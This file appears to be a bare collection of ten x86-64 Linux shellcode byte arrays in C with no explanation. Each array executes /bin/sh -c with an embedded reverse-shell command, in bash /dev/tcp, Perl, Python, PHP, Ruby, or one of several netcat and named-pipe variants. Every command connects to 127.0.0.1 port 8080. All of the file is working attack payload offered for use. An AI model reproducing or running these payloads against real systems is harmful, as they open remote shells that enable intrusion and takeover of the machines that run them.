unsigned char buf[] = 
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x28\x00"
"\x00\x00\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64"
"\x65\x76\x2f\x74\x63\x70\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e"
"\x31\x2f\x38\x30\x38\x30\x20\x30\x3e\x26\x31\x00\x56\x57\x48"
"\x89\xe6\x0f\x05";
unsigned char buf[] = 
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\xdb\x00"
"\x00\x00\x70\x65\x72\x6c\x20\x2d\x65\x20\x27\x75\x73\x65\x20"
"\x53\x6f\x63\x6b\x65\x74\x3b\x24\x69\x3d\x22\x31\x32\x37\x2e"
"\x30\x2e\x30\x2e\x31\x22\x3b\x24\x70\x3d\x38\x30\x38\x30\x3b"
"\x73\x6f\x63\x6b\x65\x74\x28\x53\x2c\x50\x46\x5f\x49\x4e\x45"
"\x54\x2c\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x2c\x67"
"\x65\x74\x70\x72\x6f\x74\x6f\x62\x79\x6e\x61\x6d\x65\x28\x22"
"\x74\x63\x70\x22\x29\x29\x3b\x69\x66\x28\x63\x6f\x6e\x6e\x65"
"\x63\x74\x28\x53\x2c\x73\x6f\x63\x6b\x61\x64\x64\x72\x5f\x69"
"\x6e\x28\x24\x70\x2c\x69\x6e\x65\x74\x5f\x61\x74\x6f\x6e\x28"
"\x24\x69\x29\x29\x29\x29\x7b\x6f\x70\x65\x6e\x28\x53\x54\x44"
"\x49\x4e\x2c\x22\x3e\x26\x53\x22\x29\x3b\x6f\x70\x65\x6e\x28"
"\x53\x54\x44\x4f\x55\x54\x2c\x22\x3e\x26\x53\x22\x29\x3b\x6f"
"\x70\x65\x6e\x28\x53\x54\x44\x45\x52\x52\x2c\x22\x3e\x26\x53"
"\x22\x29\x3b\x65\x78\x65\x63\x28\x22\x2f\x62\x69\x6e\x2f\x73"
"\x68\x20\x2d\x69\x22\x29\x3b\x7d\x3b\x27\x00\x56\x57\x48\x89"
"\xe6\x0f\x05";
unsigned char buf[] = 
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\xe2\x00"
"\x00\x00\x70\x79\x74\x68\x6f\x6e\x20\x2d\x63\x20\x27\x69\x6d"
"\x70\x6f\x72\x74\x20\x73\x6f\x63\x6b\x65\x74\x2c\x73\x75\x62"
"\x70\x72\x6f\x63\x65\x73\x73\x2c\x6f\x73\x3b\x73\x3d\x73\x6f"
"\x63\x6b\x65\x74\x2e\x73\x6f\x63\x6b\x65\x74\x28\x73\x6f\x63"
"\x6b\x65\x74\x2e\x41\x46\x5f\x49\x4e\x45\x54\x2c\x73\x6f\x63"
"\x6b\x65\x74\x2e\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d"
"\x29\x3b\x73\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x22\x31"
"\x32\x37\x2e\x30\x2e\x30\x2e\x31\x22\x2c\x38\x30\x38\x30\x29"
"\x29\x3b\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c"
"\x65\x6e\x6f\x28\x29\x2c\x30\x29\x3b\x20\x6f\x73\x2e\x64\x75"
"\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x31"
"\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69"
"\x6c\x65\x6e\x6f\x28\x29\x2c\x32\x29\x3b\x70\x3d\x73\x75\x62"
"\x70\x72\x6f\x63\x65\x73\x73\x2e\x63\x61\x6c\x6c\x28\x5b\x22"
"\x2f\x62\x69\x6e\x2f\x73\x68\x22\x2c\x22\x2d\x69\x22\x5d\x29"
"\x3b\x27\x00\x56\x57\x48\x89\xe6\x0f\x05";
unsigned char buf[] = 
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x4c\x00"
"\x00\x00\x70\x68\x70\x20\x2d\x72\x20\x27\x24\x73\x6f\x63\x6b"
"\x3d\x66\x73\x6f\x63\x6b\x6f\x70\x65\x6e\x28\x22\x31\x32\x37"
"\x2e\x30\x2e\x30\x2e\x31\x22\x2c\x38\x30\x38\x30\x29\x3b\x65"
"\x78\x65\x63\x28\x22\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2d\x69"
"\x20\x3c\x26\x33\x20\x3e\x26\x33\x20\x32\x3e\x26\x33\x22\x29"
"\x3b\x27\x00\x56\x57\x48\x89\xe6\x0f\x05";
unsigned char buf[] = 
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x6b\x00"
"\x00\x00\x72\x75\x62\x79\x20\x2d\x72\x73\x6f\x63\x6b\x65\x74"
"\x20\x2d\x65\x27\x66\x3d\x54\x43\x50\x53\x6f\x63\x6b\x65\x74"
"\x2e\x6f\x70\x65\x6e\x28\x22\x31\x32\x37\x2e\x30\x2e\x30\x2e"
"\x31\x22\x2c\x38\x30\x38\x30\x29\x2e\x74\x6f\x5f\x69\x3b\x65"
"\x78\x65\x63\x20\x73\x70\x72\x69\x6e\x74\x66\x28\x22\x2f\x62"
"\x69\x6e\x2f\x73\x68\x20\x2d\x69\x20\x3c\x26\x25\x64\x20\x3e"
"\x26\x25\x64\x20\x32\x3e\x26\x25\x64\x22\x2c\x66\x2c\x66\x2c"
"\x66\x29\x27\x00\x56\x57\x48\x89\xe6\x0f\x05";
unsigned char buf[] = 
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x1d\x00"
"\x00\x00\x6e\x63\x20\x2d\x65\x20\x2f\x62\x69\x6e\x2f\x73\x68"
"\x20\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x20\x38\x30\x38\x30"
"\x00\x56\x57\x48\x89\xe6\x0f\x05";
unsigned char buf[] = 
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x4d\x00"
"\x00\x00\x72\x6d\x20\x2f\x74\x6d\x70\x2f\x66\x3b\x6d\x6b\x66"
"\x69\x66\x6f\x20\x2f\x74\x6d\x70\x2f\x66\x3b\x63\x61\x74\x20"
"\x2f\x74\x6d\x70\x2f\x66\x7c\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x2d\x69\x20\x32\x3e\x26\x31\x7c\x6e\x63\x20\x31\x32\x37\x2e"
"\x30\x2e\x30\x2e\x31\x20\x38\x30\x38\x30\x20\x3e\x2f\x74\x6d"
"\x70\x2f\x66\x00\x56\x57\x48\x89\xe6\x0f\x05";
unsigned char buf[] = 
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x1c\x00"
"\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x20\x7c\x20\x6e\x63\x20"
"\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x20\x38\x30\x38\x30\x00"
"\x56\x57\x48\x89\xe6\x0f\x05";
unsigned char buf[] = 
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x3a\x00"
"\x00\x00\x72\x6d\x20\x2d\x66\x20\x2f\x74\x6d\x70\x2f\x70\x3b"
"\x20\x6d\x6b\x6e\x6f\x64\x20\x2f\x74\x6d\x70\x2f\x70\x20\x70"
"\x20\x26\x26\x20\x6e\x63\x20\x31\x32\x37\x2e\x30\x2e\x30\x2e"
"\x31\x20\x38\x30\x38\x30\x20\x30\x2f\x74\x6d\x70\x2f\x70\x00"
"\x56\x57\x48\x89\xe6\x0f\x05";
unsigned char buf[] = 
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\xdc\x00"
"\x00\x00\x70\x65\x72\x6c\x20\x2d\x65\x20\x27\x75\x73\x65\x20"
"\x53\x6f\x63\x6b\x65\x74\x3b\x24\x70\x3d\x38\x30\x38\x30\x3b"
"\x24\x69\x3d\x22\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x22\x3b"
"\x73\x6f\x63\x6b\x65\x74\x28\x53\x2c\x50\x46\x5f\x49\x4e\x45"
"\x54\x2c\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x2c\x67"
"\x65\x74\x70\x72\x6f\x74\x6f\x62\x79\x6e\x61\x6d\x65\x28\x22"
"\x74\x63\x70\x22\x29\x29\x3b\x69\x66\x28\x63\x6f\x6e\x6e\x65"
"\x63\x74\x28\x53\x2c\x73\x6f\x63\x6b\x61\x64\x64\x72\x5f\x69"
"\x6e\x28\x24\x70\x2c\x69\x6e\x65\x74\x5f\x61\x74\x6f\x6e\x28"
"\x24\x69\x29\x29\x29\x29\x7b\x6f\x70\x65\x6e\x28\x53\x54\x44"
"\x49\x4e\x2c\x22\x3e\x26\x53\x22\x29\x3b\x6f\x70\x65\x6e\x28"
"\x53\x54\x44\x4f\x55\x54\x2c\x22\x3e\x26\x53\x22\x29\x3b\x6f"
"\x70\x65\x6e\x28\x53\x54\x44\x45\x52\x52\x2c\x22\x3e\x26\x53"
"\x22\x29\x3b\x65\x78\x65\x63\x28\x22\x2f\x62\x69\x6e\x2f\x73"
"\x68\x20\x2d\x69\x22\x29\x3b\x7d\x3b\x27\x20\x00\x56\x57\x48"
"\x89\xe6\x0f\x05";
